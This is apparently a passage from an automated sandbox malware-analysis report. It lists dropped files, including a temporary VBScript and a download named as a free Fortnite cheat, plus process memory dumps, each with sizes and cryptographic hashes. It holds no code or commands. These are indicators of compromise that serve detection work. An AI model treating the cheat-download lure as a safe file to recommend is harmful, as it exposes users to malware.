                                                  27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                • C:\Users\Admin\AppData\Local\Temp\4B76.tmp\4B77.tmp\4B78.vbs

                                                  Filesize

                                                  588B

                                                  MD5

                                                  67706bca9ceaba11530e05d351487003

                                                  SHA1

                                                  3a5ed77f81b14093a5f18c4d46895bc7ea770fee

                                                  SHA256

                                                  190a0d994512ed000cf74bd40fb0502988c2ac48855b23a73fd905c0305fc30f

                                                  SHA512

                                                  902ac91678d85801a779acbc212c75beba72f8da996b0ed1b148a326c2dd635b88210f9a503fbbffa5271335483eae972e6a00acbc01ec013cf355c080444598

                                                • C:\Users\Admin\Downloads\Fortnite-free-cheat-main.zip.crdownload

                                                  Filesize

                                                  732KB

                                                  MD5

                                                  7bd22ac23476a1faea5638d44b218584

                                                  SHA1

                                                  9d1a10685775a4f213ab63a2eda60571d0d179c8

                                                  SHA256

                                                  6268b944bc19b7d342f6864fad29227bf88319574417bb635e7f421aa6e0262b

                                                  SHA512

                                                  c8979fe457a9dc6191d5297e5812ec4062c660e1242afe1b0f3a2717694c6013ff60a0348112ed995eed386ad9b974f779dd75200f07d4f5a932d811f1a615ab

                                                • memory/2884-578-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2884-579-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2884-583-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2884-584-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2884-574-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2884-573-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2884-572-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2884-582-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2884-580-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/2884-581-0x000002DAF87C0000-0x000002DAF87C1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                • memory/3244-612-0x00007FF6ED2A0000-0x00007FF6ED2A8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                • memory/3244-613-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp

                                                  Filesize

                                                  2.0MB

                                                • memory/3244-614-0x00007FF9A6630000-0x00007FF9A66EE000-memory.dmp

                                                  Filesize

                                                  760KB

                                                • memory/3244-616-0x00007FF9A4780000-0x00007FF9A481E000-memory.dmp

                                                  Filesize

                                                  632KB